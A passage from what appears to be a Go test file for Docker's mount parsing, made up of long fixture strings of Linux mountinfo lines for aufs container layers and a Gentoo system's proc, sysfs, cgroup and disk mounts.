/var/lib/docker/aufs/mnt/16f4d7e96dd612903f425bfe856762f291ff2e36a8ecd55a2209b7d7cd81c30b rw,relatime - aufs none rw,si=caafa54f882d525 +43 20 0:36 / /var/lib/docker/aufs/mnt/63ca08b75d7438a9469a5954e003f48ffede73541f6286ce1cb4d7dd4811da7e-init rw,relatime - aufs none rw,si=caafa54f882f525 +44 20 0:37 / /var/lib/docker/aufs/mnt/63ca08b75d7438a9469a5954e003f48ffede73541f6286ce1cb4d7dd4811da7e rw,relatime - aufs none rw,si=caafa54f88ba525 +45 20 0:38 / /var/lib/docker/aufs/mnt/283f35a910233c756409313be71ecd8fcfef0df57108b8d740b61b3e88860452 rw,relatime - aufs none rw,si=caafa54f88b8525 +46 20 0:39 / /var/lib/docker/aufs/mnt/2c6c7253d4090faa3886871fb21bd660609daeb0206588c0602007f7d0f254b1-init rw,relatime - aufs none rw,si=caafa54f88be525 +47 20 0:40 / /var/lib/docker/aufs/mnt/2c6c7253d4090faa3886871fb21bd660609daeb0206588c0602007f7d0f254b1 rw,relatime - aufs none rw,si=caafa54f882c525 +48 20 0:41 / 
/var/lib/docker/aufs/mnt/de2b538c97d6366cc80e8658547c923ea1d042f85580df379846f36a4df7049d rw,relatime - aufs none rw,si=caafa54f85bb525 +49 20 0:42 / /var/lib/docker/aufs/mnt/94a3d8ed7c27e5b0aa71eba46c736bfb2742afda038e74f2dd6035fb28415b49-init rw,relatime - aufs none rw,si=caafa54fdc00525 +50 20 0:43 / /var/lib/docker/aufs/mnt/94a3d8ed7c27e5b0aa71eba46c736bfb2742afda038e74f2dd6035fb28415b49 rw,relatime - aufs none rw,si=caafa54fbaec525 +51 20 0:44 / /var/lib/docker/aufs/mnt/6ac1cace985c9fc9bea32234de8b36dba49bdd5e29a2972b327ff939d78a6274 rw,relatime - aufs none rw,si=caafa54f8e1a525 +52 20 0:45 / /var/lib/docker/aufs/mnt/dff147033e3a0ef061e1de1ad34256b523d4a8c1fa6bba71a0ab538e8628ff0b-init rw,relatime - aufs none rw,si=caafa54f8e1d525 +53 20 0:46 / /var/lib/docker/aufs/mnt/dff147033e3a0ef061e1de1ad34256b523d4a8c1fa6bba71a0ab538e8628ff0b rw,relatime - aufs none rw,si=caafa54f8e1b525 +54 20 0:47 / /var/lib/docker/aufs/mnt/cabb117d997f0f93519185aea58389a9762770b7496ed0b74a3e4a083fa45902 rw,relatime - aufs none rw,si=caafa54f810a525 +55 20 0:48 / /var/lib/docker/aufs/mnt/e1c8a94ffaa9d532bbbdc6ef771ce8a6c2c06757806ecaf8b68e9108fec65f33-init rw,relatime - aufs none rw,si=caafa54f8529525 +56 20 0:49 / /var/lib/docker/aufs/mnt/e1c8a94ffaa9d532bbbdc6ef771ce8a6c2c06757806ecaf8b68e9108fec65f33 rw,relatime - aufs none rw,si=caafa54f852f525 +57 20 0:50 / /var/lib/docker/aufs/mnt/16a1526fa445b84ce84f89506d219e87fa488a814063baf045d88b02f21166b3 rw,relatime - aufs none rw,si=caafa54f9e1d525 +58 20 0:51 / /var/lib/docker/aufs/mnt/57b9c92e1e368fa7dbe5079f7462e917777829caae732828b003c355fe49da9f-init rw,relatime - aufs none rw,si=caafa54f854d525 +59 20 0:52 / /var/lib/docker/aufs/mnt/57b9c92e1e368fa7dbe5079f7462e917777829caae732828b003c355fe49da9f rw,relatime - aufs none rw,si=caafa54f854e525 +60 20 0:53 / /var/lib/docker/aufs/mnt/e370c3e286bea027917baa0e4d251262681a472a87056e880dfd0513516dffd9 rw,relatime - aufs none rw,si=caafa54f840a525 +61 20 0:54 / 
/var/lib/docker/aufs/mnt/6b00d3b4f32b41997ec07412b5e18204f82fbe643e7122251cdeb3582abd424e-init rw,relatime - aufs none rw,si=caafa54f8408525 +62 20 0:55 / /var/lib/docker/aufs/mnt/6b00d3b4f32b41997ec07412b5e18204f82fbe643e7122251cdeb3582abd424e rw,relatime - aufs none rw,si=caafa54f8409525 +63 20 0:56 / /var/lib/docker/aufs/mnt/abd0b5ea5d355a67f911475e271924a5388ee60c27185fcd60d095afc4a09dc7 rw,relatime - aufs none rw,si=caafa54f9eb1525 +64 20 0:57 / /var/lib/docker/aufs/mnt/336222effc3f7b89867bb39ff7792ae5412c35c749f127c29159d046b6feedd2-init rw,relatime - aufs none rw,si=caafa54f85bf525 +65 20 0:58 / /var/lib/docker/aufs/mnt/336222effc3f7b89867bb39ff7792ae5412c35c749f127c29159d046b6feedd2 rw,relatime - aufs none rw,si=caafa54f85b8525 +66 20 0:59 / /var/lib/docker/aufs/mnt/912e1bf28b80a09644503924a8a1a4fb8ed10b808ca847bda27a369919aa52fa rw,relatime - aufs none rw,si=caafa54fbaea525 +67 20 0:60 / /var/lib/docker/aufs/mnt/386f722875013b4a875118367abc783fc6617a3cb7cf08b2b4dcf550b4b9c576-init rw,relatime - aufs none rw,si=caafa54f8472525 +68 20 0:61 / /var/lib/docker/aufs/mnt/386f722875013b4a875118367abc783fc6617a3cb7cf08b2b4dcf550b4b9c576 rw,relatime - aufs none rw,si=caafa54f8474525 +69 20 0:62 / /var/lib/docker/aufs/mnt/5aaebb79ef3097dfca377889aeb61a0c9d5e3795117d2b08d0751473c671dfb2 rw,relatime - aufs none rw,si=caafa54f8c5e525 +70 20 0:63 / /var/lib/docker/aufs/mnt/5ba3e493279d01277d583600b81c7c079e691b73c3a2bdea8e4b12a35a418be2-init rw,relatime - aufs none rw,si=caafa54f8c3b525 +71 20 0:64 / /var/lib/docker/aufs/mnt/5ba3e493279d01277d583600b81c7c079e691b73c3a2bdea8e4b12a35a418be2 rw,relatime - aufs none rw,si=caafa54f8c3d525 +72 20 0:65 / /var/lib/docker/aufs/mnt/2777f0763da4de93f8bebbe1595cc77f739806a158657b033eca06f827b6028a rw,relatime - aufs none rw,si=caafa54f8c3e525 +73 20 0:66 / /var/lib/docker/aufs/mnt/5d7445562acf73c6f0ae34c3dd0921d7457de1ba92a587d9e06a44fa209eeb3e-init rw,relatime - aufs none rw,si=caafa54f8c39525 +74 20 0:67 / 
/var/lib/docker/aufs/mnt/5d7445562acf73c6f0ae34c3dd0921d7457de1ba92a587d9e06a44fa209eeb3e rw,relatime - aufs none rw,si=caafa54f854f525 +75 20 0:68 / /var/lib/docker/aufs/mnt/06400b526ec18b66639c96efc41a84f4ae0b117cb28dafd56be420651b4084a0 rw,relatime - aufs none rw,si=caafa54f840b525 +76 20 0:69 / /var/lib/docker/aufs/mnt/e051d45ec42d8e3e1cc57bb39871a40de486dc123522e9c067fbf2ca6a357785-init rw,relatime - aufs none rw,si=caafa54fdddf525 +77 20 0:70 / /var/lib/docker/aufs/mnt/e051d45ec42d8e3e1cc57bb39871a40de486dc123522e9c067fbf2ca6a357785 rw,relatime - aufs none rw,si=caafa54f854b525 +78 20 0:71 / /var/lib/docker/aufs/mnt/1ff414fa93fd61ec81b0ab7b365a841ff6545accae03cceac702833aaeaf718f rw,relatime - aufs none rw,si=caafa54f8d85525 +79 20 0:72 / /var/lib/docker/aufs/mnt/c661b2f871dd5360e46a2aebf8f970f6d39a2ff64e06979aa0361227c88128b8-init rw,relatime - aufs none rw,si=caafa54f8da3525 +80 20 0:73 / /var/lib/docker/aufs/mnt/c661b2f871dd5360e46a2aebf8f970f6d39a2ff64e06979aa0361227c88128b8 rw,relatime - aufs none rw,si=caafa54f8da2525 +81 20 0:74 / /var/lib/docker/aufs/mnt/b68b1d4fe4d30016c552398e78b379a39f651661d8e1fa5f2460c24a5e723420 rw,relatime - aufs none rw,si=caafa54f8d81525 +82 20 0:75 / /var/lib/docker/aufs/mnt/c5c5979c936cd0153a4c626fa9d69ce4fce7d924cc74fa68b025d2f585031739-init rw,relatime - aufs none rw,si=caafa54f8da1525 +83 20 0:76 / /var/lib/docker/aufs/mnt/c5c5979c936cd0153a4c626fa9d69ce4fce7d924cc74fa68b025d2f585031739 rw,relatime - aufs none rw,si=caafa54f8da0525 +84 20 0:77 / /var/lib/docker/aufs/mnt/53e10b0329afc0e0d3322d31efaed4064139dc7027fe6ae445cffd7104bcc94f rw,relatime - aufs none rw,si=caafa54f8c35525 +85 20 0:78 / /var/lib/docker/aufs/mnt/3bfafd09ff2603e2165efacc2215c1f51afabba6c42d04a68cc2df0e8cc31494-init rw,relatime - aufs none rw,si=caafa54f8db8525 +86 20 0:79 / /var/lib/docker/aufs/mnt/3bfafd09ff2603e2165efacc2215c1f51afabba6c42d04a68cc2df0e8cc31494 rw,relatime - aufs none rw,si=caafa54f8dba525 +87 20 0:80 / 
/var/lib/docker/aufs/mnt/90fdd2c03eeaf65311f88f4200e18aef6d2772482712d9aea01cd793c64781b5 rw,relatime - aufs none rw,si=caafa54f8315525 +88 20 0:81 / /var/lib/docker/aufs/mnt/7bdf2591c06c154ceb23f5e74b1d03b18fbf6fe96e35fbf539b82d446922442f-init rw,relatime - aufs none rw,si=caafa54f8fc6525 +89 20 0:82 / /var/lib/docker/aufs/mnt/7bdf2591c06c154ceb23f5e74b1d03b18fbf6fe96e35fbf539b82d446922442f rw,relatime - aufs none rw,si=caafa54f8468525 +90 20 0:83 / /var/lib/docker/aufs/mnt/8cf9a993f50f3305abad3da268c0fc44ff78a1e7bba595ef9de963497496c3f9 rw,relatime - aufs none rw,si=caafa54f8c59525 +91 20 0:84 / /var/lib/docker/aufs/mnt/ecc896fd74b21840a8d35e8316b92a08b1b9c83d722a12acff847e9f0ff17173-init rw,relatime - aufs none rw,si=caafa54f846a525 +92 20 0:85 / /var/lib/docker/aufs/mnt/ecc896fd74b21840a8d35e8316b92a08b1b9c83d722a12acff847e9f0ff17173 rw,relatime - aufs none rw,si=caafa54f846b525 +93 20 0:86 / /var/lib/docker/aufs/mnt/d8c8288ec920439a48b5796bab5883ee47a019240da65e8d8f33400c31bac5df rw,relatime - aufs none rw,si=caafa54f8dbf525 +94 20 0:87 / /var/lib/docker/aufs/mnt/ecba66710bcd03199b9398e46c005cd6b68d0266ec81dc8b722a29cc417997c6-init rw,relatime - aufs none rw,si=caafa54f810f525 +95 20 0:88 / /var/lib/docker/aufs/mnt/ecba66710bcd03199b9398e46c005cd6b68d0266ec81dc8b722a29cc417997c6 rw,relatime - aufs none rw,si=caafa54fbae9525 +96 20 0:89 / /var/lib/docker/aufs/mnt/befc1c67600df449dddbe796c0d06da7caff1d2bbff64cde1f0ba82d224996b5 rw,relatime - aufs none rw,si=caafa54f8dab525 +97 20 0:90 / /var/lib/docker/aufs/mnt/c9f470e73d2742629cdc4084a1b2c1a8302914f2aa0d0ec4542371df9a050562-init rw,relatime - aufs none rw,si=caafa54fdc02525 +98 20 0:91 / /var/lib/docker/aufs/mnt/c9f470e73d2742629cdc4084a1b2c1a8302914f2aa0d0ec4542371df9a050562 rw,relatime - aufs none rw,si=caafa54f9eb0525 +99 20 0:92 / /var/lib/docker/aufs/mnt/2a31f10029f04ff9d4381167a9b739609853d7220d55a56cb654779a700ee246 rw,relatime - aufs none rw,si=caafa54f8c37525 +100 20 0:93 / 
/var/lib/docker/aufs/mnt/8c4261b8e3e4b21ebba60389bd64b6261217e7e6b9fd09e201d5a7f6760f6927-init rw,relatime - aufs none rw,si=caafa54fd173525 +101 20 0:94 / /var/lib/docker/aufs/mnt/8c4261b8e3e4b21ebba60389bd64b6261217e7e6b9fd09e201d5a7f6760f6927 rw,relatime - aufs none rw,si=caafa54f8108525 +102 20 0:95 / /var/lib/docker/aufs/mnt/eaa0f57403a3dc685268f91df3fbcd7a8423cee50e1a9ee5c3e1688d9d676bb4 rw,relatime - aufs none rw,si=caafa54f852d525 +103 20 0:96 / /var/lib/docker/aufs/mnt/9cfe69a2cbffd9bfc7f396d4754f6fe5cc457ef417b277797be3762dfe955a6b-init rw,relatime - aufs none rw,si=caafa54f8d80525 +104 20 0:97 / /var/lib/docker/aufs/mnt/9cfe69a2cbffd9bfc7f396d4754f6fe5cc457ef417b277797be3762dfe955a6b rw,relatime - aufs none rw,si=caafa54f8fc3525 +105 20 0:98 / /var/lib/docker/aufs/mnt/d1b322ae17613c6adee84e709641a9244ac56675244a89a64dc0075075fcbb83 rw,relatime - aufs none rw,si=caafa54f8c58525 +106 20 0:99 / /var/lib/docker/aufs/mnt/d46c2a8e9da7e91ab34fd9c192851c246a4e770a46720bda09e55c7554b9dbbd-init rw,relatime - aufs none rw,si=caafa54f8c63525 +107 20 0:100 / /var/lib/docker/aufs/mnt/d46c2a8e9da7e91ab34fd9c192851c246a4e770a46720bda09e55c7554b9dbbd rw,relatime - aufs none rw,si=caafa54f8c67525 +108 20 0:101 / /var/lib/docker/aufs/mnt/bc9d2a264158f83a617a069bf17cbbf2a2ba453db7d3951d9dc63cc1558b1c2b rw,relatime - aufs none rw,si=caafa54f8dbe525 +109 20 0:102 / /var/lib/docker/aufs/mnt/9e6abb8d72bbeb4d5cf24b96018528015ba830ce42b4859965bd482cbd034e99-init rw,relatime - aufs none rw,si=caafa54f9e0d525 +110 20 0:103 / /var/lib/docker/aufs/mnt/9e6abb8d72bbeb4d5cf24b96018528015ba830ce42b4859965bd482cbd034e99 rw,relatime - aufs none rw,si=caafa54f9e1b525 +111 20 0:104 / /var/lib/docker/aufs/mnt/d4dca7b02569c732e740071e1c654d4ad282de5c41edb619af1f0aafa618be26 rw,relatime - aufs none rw,si=caafa54f8dae525 +112 20 0:105 / /var/lib/docker/aufs/mnt/fea63da40fa1c5ffbad430dde0bc64a8fc2edab09a051fff55b673c40a08f6b7-init rw,relatime - aufs none rw,si=caafa54f8c5c525 +113 20 0:106 / 
/var/lib/docker/aufs/mnt/fea63da40fa1c5ffbad430dde0bc64a8fc2edab09a051fff55b673c40a08f6b7 rw,relatime - aufs none rw,si=caafa54fd172525 +114 20 0:107 / /var/lib/docker/aufs/mnt/e60c57499c0b198a6734f77f660cdbbd950a5b78aa23f470ca4f0cfcc376abef rw,relatime - aufs none rw,si=caafa54909c4525 +115 20 0:108 / /var/lib/docker/aufs/mnt/099c78e7ccd9c8717471bb1bbfff838c0a9913321ba2f214fbeaf92c678e5b35-init rw,relatime - aufs none rw,si=caafa54909c3525 +116 20 0:109 / /var/lib/docker/aufs/mnt/099c78e7ccd9c8717471bb1bbfff838c0a9913321ba2f214fbeaf92c678e5b35 rw,relatime - aufs none rw,si=caafa54909c7525 +117 20 0:110 / /var/lib/docker/aufs/mnt/2997be666d58b9e71469759bcb8bd9608dad0e533a1a7570a896919ba3388825 rw,relatime - aufs none rw,si=caafa54f8557525 +118 20 0:111 / /var/lib/docker/aufs/mnt/730694eff438ef20569df38dfb38a920969d7ff2170cc9aa7cb32a7ed8147a93-init rw,relatime - aufs none rw,si=caafa54c6e88525 +119 20 0:112 / /var/lib/docker/aufs/mnt/730694eff438ef20569df38dfb38a920969d7ff2170cc9aa7cb32a7ed8147a93 rw,relatime - aufs none rw,si=caafa54c6e8e525 +120 20 0:113 / /var/lib/docker/aufs/mnt/a672a1e2f2f051f6e19ed1dfbe80860a2d774174c49f7c476695f5dd1d5b2f67 rw,relatime - aufs none rw,si=caafa54c6e15525 +121 20 0:114 / /var/lib/docker/aufs/mnt/aba3570e17859f76cf29d282d0d150659c6bd80780fdc52a465ba05245c2a420-init rw,relatime - aufs none rw,si=caafa54f8dad525 +122 20 0:115 / /var/lib/docker/aufs/mnt/aba3570e17859f76cf29d282d0d150659c6bd80780fdc52a465ba05245c2a420 rw,relatime - aufs none rw,si=caafa54f8d84525 +123 20 0:116 / /var/lib/docker/aufs/mnt/2abc86007aca46fb4a817a033e2a05ccacae40b78ea4b03f8ea616b9ada40e2e rw,relatime - aufs none rw,si=caafa54c6e8b525 +124 20 0:117 / /var/lib/docker/aufs/mnt/36352f27f7878e648367a135bd1ec3ed497adcb8ac13577ee892a0bd921d2374-init rw,relatime - aufs none rw,si=caafa54c6e8d525 +125 20 0:118 / /var/lib/docker/aufs/mnt/36352f27f7878e648367a135bd1ec3ed497adcb8ac13577ee892a0bd921d2374 rw,relatime - aufs none rw,si=caafa54f8c34525 +126 20 0:119 / 
/var/lib/docker/aufs/mnt/2f95ca1a629cea8363b829faa727dd52896d5561f2c96ddee4f697ea2fc872c2 rw,relatime - aufs none rw,si=caafa54c6e8a525 +127 20 0:120 / /var/lib/docker/aufs/mnt/f108c8291654f179ef143a3e07de2b5a34adbc0b28194a0ab17742b6db9a7fb2-init rw,relatime - aufs none rw,si=caafa54f8e19525 +128 20 0:121 / /var/lib/docker/aufs/mnt/f108c8291654f179ef143a3e07de2b5a34adbc0b28194a0ab17742b6db9a7fb2 rw,relatime - aufs none rw,si=caafa54fa8c6525 +129 20 0:122 / /var/lib/docker/aufs/mnt/c1d04dfdf8cccb3676d5a91e84e9b0781ce40623d127d038bcfbe4c761b27401 rw,relatime - aufs none rw,si=caafa54f8c30525 +130 20 0:123 / /var/lib/docker/aufs/mnt/3f4898ffd0e1239aeebf1d1412590cdb7254207fa3883663e2c40cf772e5f05a-init rw,relatime - aufs none rw,si=caafa54c6e1a525 +131 20 0:124 / /var/lib/docker/aufs/mnt/3f4898ffd0e1239aeebf1d1412590cdb7254207fa3883663e2c40cf772e5f05a rw,relatime - aufs none rw,si=caafa54c6e1c525 +132 20 0:125 / /var/lib/docker/aufs/mnt/5ae3b6fccb1539fc02d420e86f3e9637bef5b711fed2ca31a2f426c8f5deddbf rw,relatime - aufs none rw,si=caafa54c4fea525 +133 20 0:126 / /var/lib/docker/aufs/mnt/310bfaf80d57020f2e73b06aeffb0b9b0ca2f54895f88bf5e4d1529ccac58fe0-init rw,relatime - aufs none rw,si=caafa54c6e1e525 +134 20 0:127 / /var/lib/docker/aufs/mnt/310bfaf80d57020f2e73b06aeffb0b9b0ca2f54895f88bf5e4d1529ccac58fe0 rw,relatime - aufs none rw,si=caafa54fa8c0525 +135 20 0:128 / /var/lib/docker/aufs/mnt/f382bd5aaccaf2d04a59089ac7cb12ec87efd769fd0c14d623358fbfd2a3f896 rw,relatime - aufs none rw,si=caafa54c4fec525 +136 20 0:129 / /var/lib/docker/aufs/mnt/50d45e9bb2d779bc6362824085564c7578c231af5ae3b3da116acf7e17d00735-init rw,relatime - aufs none rw,si=caafa54c4fef525 +137 20 0:130 / /var/lib/docker/aufs/mnt/50d45e9bb2d779bc6362824085564c7578c231af5ae3b3da116acf7e17d00735 rw,relatime - aufs none rw,si=caafa54c4feb525 +138 20 0:131 / /var/lib/docker/aufs/mnt/a9c5ee0854dc083b6bf62b7eb1e5291aefbb10702289a446471ce73aba0d5d7d rw,relatime - aufs none rw,si=caafa54909c6525 +139 20 0:134 / 
/var/lib/docker/aufs/mnt/03a613e7bd5078819d1fd92df4e671c0127559a5e0b5a885cc8d5616875162f0-init rw,relatime - aufs none rw,si=caafa54804fe525 +140 20 0:135 / /var/lib/docker/aufs/mnt/03a613e7bd5078819d1fd92df4e671c0127559a5e0b5a885cc8d5616875162f0 rw,relatime - aufs none rw,si=caafa54804fa525 +141 20 0:136 / /var/lib/docker/aufs/mnt/7ec3277e5c04c907051caf9c9c35889f5fcd6463e5485971b25404566830bb70 rw,relatime - aufs none rw,si=caafa54804f9525 +142 20 0:139 / /var/lib/docker/aufs/mnt/26b5b5d71d79a5b2bfcf8bc4b2280ee829f261eb886745dd90997ed410f7e8b8-init rw,relatime - aufs none rw,si=caafa54c6ef6525 +143 20 0:140 / /var/lib/docker/aufs/mnt/26b5b5d71d79a5b2bfcf8bc4b2280ee829f261eb886745dd90997ed410f7e8b8 rw,relatime - aufs none rw,si=caafa54c6ef5525 +144 20 0:356 / /var/lib/docker/aufs/mnt/e6ecde9e2c18cd3c75f424c67b6d89685cfee0fc67abf2cb6bdc0867eb998026 rw,relatime - aufs none rw,si=caafa548068e525` + + gentooMountinfo = `15 1 8:6 / / rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +16 15 0:3 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw +17 15 0:14 / /run rw,nosuid,nodev,relatime - tmpfs tmpfs rw,size=3292172k,mode=755 +18 15 0:5 / /dev rw,nosuid,relatime - devtmpfs udev rw,size=10240k,nr_inodes=4106451,mode=755 +19 18 0:12 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw +20 18 0:10 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=000 +21 18 0:15 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw +22 15 0:16 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw +23 22 0:7 / /sys/kernel/debug rw,nosuid,nodev,noexec,relatime - debugfs debugfs rw +24 22 0:17 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs cgroup_root rw,size=10240k,mode=755 +25 24 0:18 / /sys/fs/cgroup/openrc rw,nosuid,nodev,noexec,relatime - cgroup openrc rw,release_agent=/lib64/rc/sh/cgroup-release-agent.sh,name=openrc +26 24 0:19 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime - cgroup cpuset 
rw,cpuset,clone_children +27 24 0:20 / /sys/fs/cgroup/cpu rw,nosuid,nodev,noexec,relatime - cgroup cpu rw,cpu,clone_children +28 24 0:21 / /sys/fs/cgroup/cpuacct rw,nosuid,nodev,noexec,relatime - cgroup cpuacct rw,cpuacct,clone_children +29 24 0:22 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime - cgroup memory rw,memory,clone_children +30 24 0:23 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime - cgroup devices rw,devices,clone_children +31 24 0:24 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime - cgroup freezer rw,freezer,clone_children +32 24 0:25 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime - cgroup blkio rw,blkio,clone_children +33 15 8:1 / /boot rw,noatime,nodiratime - vfat /dev/sda1 rw,fmask=0022,dmask=0022,codepage=437,iocharset=iso8859-1,shortname=mixed,errors=remount-ro +34 15 8:18 / /mnt/xfs rw,noatime,nodiratime - xfs /dev/sdb2 rw,attr2,inode64,noquota +35 15 0:26 / /tmp rw,relatime - tmpfs tmpfs rw +36 16 0:27 / /proc/sys/fs/binfmt_misc rw,nosuid,nodev,noexec,relatime - binfmt_misc binfmt_misc rw +42 15 0:33 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs rpc_pipefs rw +43 16 0:34 / /proc/fs/nfsd rw,nosuid,nodev,noexec,relatime - nfsd nfsd rw +44 15 0:35 / /home/tianon/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=1000,group_id=1000 +68 15 0:3336 / /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd rw,relatime - aufs none rw,si=9b4a7640128db39c +86 68 8:6 /var/lib/docker/containers/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/config.env /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/.dockerenv rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +87 68 8:6 /etc/resolv.conf /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/etc/resolv.conf rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +88 68 8:6 
/var/lib/docker/containers/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/hostname /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/etc/hostname rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +89 68 8:6 /var/lib/docker/containers/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/hosts /var/lib/docker/aufs/mnt/3597a1a6d6298c1decc339ebb90aad6f7d6ba2e15af3131b1f85e7ee4787a0cd/etc/hosts rw,noatime,nodiratime - ext4 /dev/sda6 rw,data=ordered +38 15 0:3384 / /var/lib/docker/aufs/mnt/0292005a9292401bb5197657f2b682d97d8edcb3b72b5e390d2a680139985b55 rw,relatime - aufs none rw,si=9b4a7642b584939c +39 15 0:3385 / /var/lib/docker/aufs/mnt/59db98c889de5f71b70cfb82c40cbe47b64332f0f56042a2987a9e5df6e5e3aa rw,relatime - aufs none rw,si=9b4a7642b584e39c +40 15 0:3386 / /var/lib/docker/aufs/mnt/0545f0f2b6548eb9601d08f35a08f5a0a385407d36027a28f58e06e9f61e0278 rw,relatime - aufs none rw,si=9b4a7642b584b39c +41 15 0:3387 / /var/lib/docker/aufs/mnt/d882cfa16d1aa8fe0331a36e79be3d80b151e49f24fc39a39c3fed1735d5feb5 rw,relatime - aufs none rw,si=9b4a76453040039c +45 15 0:3388 / /var/lib/docker/aufs/mnt/055ca3befcb1626e74f5344b3398724ff05c0de0e20021683d04305c9e70a3f6 rw,relatime - aufs none rw,si=9b4a76453040739c +46 15 0:3389 / /var/lib/docker/aufs/mnt/b899e4567a351745d4285e7f1c18fdece75d877deb3041981cd290be348b7aa6 rw,relatime - aufs none rw,si=9b4a7647def4039c +47 15 0:3390 / /var/lib/docker/aufs/mnt/067ca040292c58954c5129f953219accfae0d40faca26b4d05e76ca76a998f16 rw,relatime - aufs none rw,si=9b4a7647def4239c +48 15 0:3391 / /var/lib/docker/aufs/mnt/8c995e7cb6e5082742daeea720e340b021d288d25d92e0412c03d200df308a11 rw,relatime - aufs none rw,si=9b4a764479c1639c +49 15 0:3392 / /var/lib/docker/aufs/mnt/07cc54dfae5b45300efdacdd53cc72c01b9044956a86ce7bff42d087e426096d rw,relatime - aufs none rw,si=9b4a764479c1739c +50 15 0:3393 / 
/var/lib/docker/aufs/mnt/0a9c95cf4c589c05b06baa79150b0cc1d8e7102759fe3ce4afaabb8247ca4f85 rw,relatime - aufs none rw,si=9b4a7644059c839c +51 15 0:3394 / /var/lib/docker/aufs/mnt/468fa98cececcf4e226e8370f18f4f848d63faf287fb8321a07f73086441a3a0 rw,relatime - aufs none rw,si=9b4a7644059ca39c +52 15 0:3395 / /var/lib/docker/aufs/mnt/0b826192231c5ce066fffb5beff4397337b5fc19a377aa7c6282c7c0ce7f111f rw,relatime - aufs none rw,si=9b4a764479c1339c +53 15 0:3396 / /var/lib/docker/aufs/mnt/93b8ba1b772fbe79709b909c43ea4b2c30d712e53548f467db1ffdc7a384f196 rw,relatime - aufs none rw,si=9b4a7640798a739c +54 15 0:3397 / /var/lib/docker/aufs/mnt/0c0d0acfb506859b12ef18cdfef9ebed0b43a611482403564224bde9149d373c rw,relatime - aufs none rw,si=9b4a7640798a039c +55 15 0:3398 / /var/lib/docker/aufs/mnt/33648c39ab6c7c74af0243d6d6a81b052e9e25ad1e04b19892eb2dde013e358b rw,relatime - aufs none rw,si=9b4a7644b439b39c +56 15 0:3399 / /var/lib/docker/aufs/mnt/0c12bea97a1c958a3c739fb148536c1c89351d48e885ecda8f0499b5cc44407e rw,relatime - aufs none rw,si=9b4a7640798a239c +57 15 0:3400 / /var/lib/docker/aufs/mnt/ed443988ce125f172d7512e84a4de2627405990fd767a16adefa8ce700c19ce8 rw,relatime - aufs none rw,si=9b4a7644c8ed339c +59 15 0:3402 / /var/lib/docker/aufs/mnt/f61612c324ff3c924d3f7a82fb00a0f8d8f73c248c41897061949e9f5ab7e3b1 rw,relatime - aufs none rw,si=9b4a76442810c39c +60 15 0:3403 / /var/lib/docker/aufs/mnt/0f1ee55c6c4e25027b80de8e64b8b6fb542b3b41aa0caab9261da75752e22bfd rw,relatime - aufs none rw,si=9b4a76442810e39c +61 15 0:3404 / /var/lib/docker/aufs/mnt/956f6cc4af5785cb3ee6963dcbca668219437d9b28f513290b1453ac64a34f97 rw,relatime - aufs none rw,si=9b4a7644303ec39c +62 15 0:3405 / /var/lib/docker/aufs/mnt/1099769158c4b4773e2569e38024e8717e400f87a002c41d8cf47cb81b051ba6 rw,relatime - aufs none rw,si=9b4a7644303ee39c +63 15 0:3406 / /var/lib/docker/aufs/mnt/11890ceb98d4442595b676085cd7b21550ab85c5df841e0fba997ff54e3d522d rw,relatime - aufs none rw,si=9b4a7644303ed39c +64 15 0:3407 / 
/var/lib/docker/aufs/mnt/acdb90dc378e8ed2420b43a6d291f1c789a081cd1904018780cc038fcd7aae53 rw,relatime - aufs none rw,si=9b4a76434be2139c +65 15 0:3408 / /var/lib/docker/aufs/mnt/120e716f19d4714fbe63cc1ed246204f2c1106eefebc6537ba2587d7e7711959 rw,relatime - aufs none rw,si=9b4a76434be2339c +66 15 0:3409 / /var/lib/docker/aufs/mnt/b197b7fffb61d89e0ba1c40de9a9fc0d912e778b3c1bd828cf981ff37c1963bc rw,relatime - aufs none rw,si=9b4a76434be2039c +70 15 0:3412 / /var/lib/docker/aufs/mnt/1434b69d2e1bb18a9f0b96b9cdac30132b2688f5d1379f68a39a5e120c2f93eb rw,relatime - aufs none rw,si=9b4a76434be2639c +71 15 0:3413 / /var/lib/docker/aufs/mnt/16006e83caf33ab5eb0cd6afc92ea2ee8edeff897496b0bb3ec3a75b767374b3 rw,relatime - aufs none rw,si=9b4a7644d790439c +72 15 0:3414 / /var/lib/docker/aufs/mnt/55bfa5f44e94d27f91f79ba901b118b15098449165c87abf1b53ffff147ff164 rw,relatime - aufs none rw,si=9b4a7644d790239c +73 15 0:3415 / /var/lib/docker/aufs/mnt/1912b97a07ab21ccd98a2a27bc779bf3cf364a3138afa3c3e6f7f169a3c3eab5 rw,relatime - aufs none rw,si=9b4a76441822739c +76 15 0:3418 / 